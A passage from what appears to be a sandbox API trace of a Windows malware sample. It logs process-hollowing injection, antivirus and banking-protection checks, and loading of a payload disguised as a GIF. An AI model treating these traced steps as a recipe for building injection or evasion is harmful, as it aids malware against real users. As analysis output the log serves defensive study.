SegCs=0x1b, EFlags=0x200, Esp=0xefa28, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0137.695] ReadProcessMemory (in: hProcess=0x10c, lpBaseAddress=0x7ffd5008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0137.695] VirtualAllocEx (hProcess=0x10c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0137.695] VirtualAlloc (lpAddress=0x1aa0000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1aa0000
[0137.702] WriteProcessMemory (in: hProcess=0x10c, lpBaseAddress=0x400000, lpBuffer=0x1a9cca4*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1a9cca4*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0137.714] WriteProcessMemory (in: hProcess=0x10c, lpBaseAddress=0x7ffd5008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0137.714] SetThreadContext (hThread=0x110, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0xefa28, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0137.714] ResumeThread (hThread=0x110) returned 0x1
[0137.714] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0137.715] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.715] GlobalUnlock (hMem=0x189000c) returned 0
[0137.715] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0137.715] GlobalUnlock (hMem=0x1890004) returned 0
[0137.723] Sleep (dwMilliseconds=0xe74e)
[0147.725] VirtualFree (lpAddress=0x1b00000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0147.726] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0147.726] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0147.726] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0147.726] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0147.726] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118
[0147.726] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0147.726] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0147.726] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0147.727] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0147.729] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0147.729] ReadFile (in: hFile=0x118, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0147.731] CloseHandle (hObject=0x118) returned 1
[0147.731] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.732] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.732] GlobalUnlock (hMem=0x189000c) returned 0
[0147.732] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0147.732] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.733] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.733] GlobalUnlock (hMem=0x189000c) returned 0
[0147.733] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0147.734] GlobalLock (hMem=0x189000c) returned 0x25f110
[0147.734] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0147.734] GlobalUnlock (hMem=0x189000c) returned 0
[0147.734] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0147.735] GlobalLock (hMem=0x189000c) returned 0x265120
[0147.736] GlobalHandle (pMem=0x265120) returned 0x189000c
[0147.736] GlobalUnlock (hMem=0x189000c) returned 0
[0147.736] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0147.736] GlobalLock (hMem=0x189000c) returned 0x265120
[0147.737] GlobalHandle (pMem=0x265120) returned 0x189000c
[0147.737] GlobalUnlock (hMem=0x189000c) returned 0
[0147.737] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0147.738] GlobalLock (hMem=0x189000c) returned 0x26f130
[0147.738] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0147.738] GlobalUnlock (hMem=0x189000c) returned 0
[0147.739] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0147.739] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.739] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.739] GlobalUnlock (hMem=0x189000c) returned 0
[0147.739] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0147.739] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.740] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.740] GlobalUnlock (hMem=0x189000c) returned 0
[0147.740] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0147.740] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.741] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.741] GlobalUnlock (hMem=0x189000c) returned 0
[0147.741] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0147.741] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.742] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.742] GlobalUnlock (hMem=0x189000c) returned 0
[0147.742] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0147.742] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.743] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.743] GlobalUnlock (hMem=0x189000c) returned 0
[0147.743] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0147.743] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.744] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.744] GlobalUnlock (hMem=0x189000c) returned 0
[0147.744] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0147.744] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.745] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.745] GlobalUnlock (hMem=0x189000c) returned 0
[0147.745] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0147.745] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.746] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.746] GlobalUnlock (hMem=0x189000c) returned 0
[0147.746] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0147.746] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.747] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.747] GlobalUnlock (hMem=0x189000c) returned 0
[0147.747] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0147.747] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.748] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.748] GlobalUnlock (hMem=0x189000c) returned 0
[0147.748] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0147.749] GlobalLock (hMem=0x189000c) returned 0x27b110
[0147.750] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0147.750] GlobalUnlock (hMem=0x189000c) returned 0
[0147.750] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0147.750] GlobalLock (hMem=0x189000c) returned 0x27b110
[0147.751] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0147.751] GlobalUnlock (hMem=0x189000c) returned 0
[0147.751] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0147.753] GlobalLock (hMem=0x189000c) returned 0x29f120
[0147.754] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0147.754] GlobalUnlock (hMem=0x189000c) returned 0
[0147.754] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0147.754] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.755] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.755] GlobalUnlock (hMem=0x189000c) returned 0
[0147.755] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0147.755] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.756] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.756] GlobalUnlock (hMem=0x189000c) returned 0
[0147.756] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0147.756] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.757] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.757] GlobalUnlock (hMem=0x189000c) returned 0
[0147.757] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0147.757] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.758] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.758] GlobalUnlock (hMem=0x189000c) returned 0
[0147.758] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0147.758] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.759] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0147.759] GlobalUnlock (hMem=0x189000c) returned 0
[0147.759] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0147.759] GlobalLock (hMem=0x189000c) returned 0x25b100
[0147.759] GlobalHandle (pMem=0x25b100) returned 0x189000c
